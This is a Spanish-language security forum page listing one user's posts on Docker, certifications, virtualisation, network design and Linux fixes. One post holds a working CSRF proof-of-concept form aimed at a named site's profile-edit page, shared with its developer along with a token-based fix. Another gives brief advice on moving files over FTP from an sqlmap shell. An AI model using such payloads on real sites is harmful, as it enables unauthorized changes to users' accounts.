Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Olger346

#1
Creo que te refieres a los tokens digitales, los mismos son "dinero digital" respaldado por algo, como los tokens LCX o PYLNT.
#2
Puedes instalar belarc en la maquima del equipo y acceder por web y te tora tpda la info
#3
Dudas y pedidos generales / Re:Dudas sobre SSL
Febrero 28, 2019, 09:53:56 PM
Hola, seguramente cuando esp pasa debes reiniciar el servicio que corre en docker (apache) por ejemplo. Veo que en tu explicacion omites informacion sobre el proceso en el que se manejan los dockers. Antrax tiene razon sobre lo del ssl sin embargo debes tener en cuenta que cuando sales de un docker (tu webapp) va a reiniciar la configuración que tenía. Para salvar los cambios debes escribirlos sobre el dockerfile o hacer un commit de la imagen o bien reemplazando la conf que tengas en una maquina local con la sentencia ADD. Sería vital que nos dieras esta info para poder ayudarte
#4
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
PoC CSRF



Voy a tener que investigar como solucionar esto ya que no tengo ni idea de porque ocurre xD, en el caso del iframe de dar me gusta me suena claro ya que los parametros se envian por $_GET pero aqui que es por $_POST me has perdido jaja
Te molestaria pasarme el "payload" del boton ?

Si bartz! pare eso estamos, el payload no tiene gran ciencia!

Código: php

<html>
<body>
  <form action="http://afaik.cf/socialc0de/editarperfil.php" method="POST">
      <input type="hidden" name="nombre" value="pwned!" />
      <input type="hidden" name="usuario" value="pwned!" />
      <input type="hidden" name="profesion" value="pwned" />
      <input type="hidden" name="pais" value="pwned">
      <input type="submit" name="editar" value="No me toques!" />
    </form>
</body>
</html>




podrias emplear tokens en los formularios! y validar que sean enviados cada vez que mandas un request, de esa manera solucionando un error solucionas los dos :)
Si por ahi está la No tienes permitido ver los links. Registrarse o Entrar a mi cuenta implementación, sin embargo también he visto a muchas webs poner los tokens en el storage del cliente, si borras ese valor, los tokens nunca cambian ni se validan xD
#5
Nick: Hack666, hasta donde puedo apreciar la aplicación no valida el MIME type del archivo, por lo que se puede subir prácticamente cualquier tipo de archivo como foto de perfil. (probado con XML, MD). De todas formas como es blackbox, me dirás si los archivos fueron subidos o no. (validar mime type)

Btw: solo a manera de recomendación, ya que me gustó bastante todo, sería genial que la pusieras en github o hacer un review para linkedin, uno nunca sabe cuando proyectos como este puedan darte una buena oportunidad laboral.
#6
Puedes usar SpiceWorks, en la versión gratuita, si tienes AD en la empresa te va de maravillas
#7
usalmente es de 3 a 5 mts para lineas de alta tension. Aunque el par trenzado no se utiliza cerca de las mismas, si estas haciendo un cableado interno, basta con que utilizes una tubería de PVC o un cable de par trenzado blindado. Si hablas del cable de la fibra de internet es mas o menos ese rango.
#8
Depende del tamaño de la corporación y lo que te puedan pagar. Grandes corporaciones en europa y norte américa piden CISSP y creo que es justificable, es el top del top de las certificaciones. las de ISACA en general he visto por ahi en trabajos remotos, sin embargo CISA no es la más buscada, CRISC o CSIM tienen mayor visibilidad. Creo que mientras más pequeña sea la empresa menor grado y prestigio de certificación.
#9
Bueno si sirve, en estos días salió un comunicado del cert de US sobre un financiamiento de espionaje por parte de los rusos. Bien, los rusos (no necesariamente usaban un scanner de vulnerabilidades), se aprovechan de un protocolo que CISCO tiene sin autenticación para pedir archivos de configuración de los dispositivos de red, entre otras cosas, utilizando protocolos como SMI, SNMPv2, puedes obtener cosas interesantes sin matarte mucho (ojo que la versión 2 de snmp es en texto claro), normalmente un scanner de vulnerabilidades marcaría esto como un punto al que prestarle atención.

Entonces tiene su valor.
#10
hay un archivo que bloquea el proceso del gestor de paquetes de Linux, usualmente pasa en ubuntu. Puedes resolver el problema eliminando el paquete del directorio de /var, aveces también tienes que borrarlo del caché.

Código: php
sudo rm /var/lib/dpkg/lock
sudo apt-get install nombre-del-paquete


si te sigue bloqueando otra vez solo elimina el archivo en la ruta que te indica el terminal.
#11
Como usuario de ambas plataformas todo depende de los recursos que tengas. Yo he tenido mejores experiencias con vmware que con virtualbox. Virtual box si que es mucho más ligero, pero en mi opinión vmware te facilita más opciones en cuanto se te presenta el ruteo de maquinas virtuales. Si solo vas a probar una maquina y tal virtualbox es lo mejor. Si vas a probar cosas más elevadas tienes otras opciones como XenServer o HyperV.
#12
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
muchas gracias.
#13
Buenas, ¿qué tal comunidad?

Tengo una duda, ya que estoy analizando un programa de Python y me he perdido en la secuencia en la ejecución del mismo por la gran cantidad de archivos que tiene y la gran cantidad de código.

Hay alguna forma de interpretarlo paso a paso? como en algún debugger. Nótese que no es un exe.

Gracias por leer.
#14
Ingeniería Inversa / Re:Cutter [radare2 GUI]
Febrero 09, 2018, 11:14:43 AM
Para evitar errores añadir los siguientes paquetes a la distro
Código: php
apt-get install git build-essential cmake qt5-default qtscript5-dev libssl-dev qttools5-dev qttools5-dev-tools qtmultimedia5-dev libqt5svg5-dev libqt5webkit5-dev libsdl2-dev libasound2 libxmu-dev libxi-dev freeglut3-dev libasound2-dev libjack-jackd2-dev libxrandr-dev libqt5xmlpatterns5-dev libqt5xmlpatterns5 libqt5xmlpatterns5-private-dev
#15
Si estas usando una maquina linux (shell de sqlmap) puedes subir tu archivo al servicio FTP del windows server. De igual manera con una shell de windows normal el comando ftp debería servir. Bien vuelvo a leer, intentaste con el modo pasivo del comando ftp?
#16
Buen post compañero, muy interesante, en verdad.

Ahora tengo 2 dudas.

La primera. ¿Por qué inviertes el hexadecimal obtenido, digo no se puede insertar directamente al registro de esa forma?

La segunda que puede ser un poco primitiva... ¿Estos valores al ser guardados en el registro EAX, son más grandes de 32 bits, cómo no se sobrecarga este registro? :)
#17
Dudas y pedidos generales / Re:Intranet y web
Febrero 04, 2018, 07:28:15 PM
Desde mi punto de vista tienes 2 caminos muy claros....

1. Notificar al CERT de tu país (Centro de respuesta a incidentes de Seguridad Informática) indicando el problema y especificandolo, ya que los cert´s tienen interacción con otros certs de otros paises, de hecho ellos pueden hacer el trámite legal para la investigación del ataque y determinar el/los culpables.

Si no eres el administrador, contacta al mismo explicandole lo que puede hacer. Los certs tienen muchas herramientas para determinar causas y contactos con proveedores de host y servicios.

2. Utiliza cloud flare, tiene muchas opciones gratuitas, y si manejas todo bien verás que el rendimiento de tus equipos bajará.
#18
Prueba cambiando de modo BIOS a UEFI o viceversa o intenta quitar el secure boot, que no me había fijado bien, debe encender aún teniendo el secure boot.
#19
Intenta cambiar a modo UEFI una vez más, puede deberse a como hayas hecho el booteable y su modo de compatibilidad.
#20
Hola Bartz.

Como mencionaron los demás, puedes juntar los demás servicios de DNS, Mail y ftp en un solo servidor, sin embargo la puesta de los mismos controles de seguridad, no siempre son una buena "practica". Podrías simplificar mucho tu red. Pero en teoría estas bastante bien.

1. La autenticación de los usuarios por qué medio se da¿? AD o LDAP y a que servicios pueden acceder los mismos, al poner o no una vpn debes tomarlo en cuenta. Básicamente cualquiera lleva su equipo lo enchufa y tiene acceso.
2. Los backups siempre son buenos y contar con una réplica en otro sitio siempre es buena idea.
3. Lo demás son las configuraciones de los equipos, pero eso es otro tema.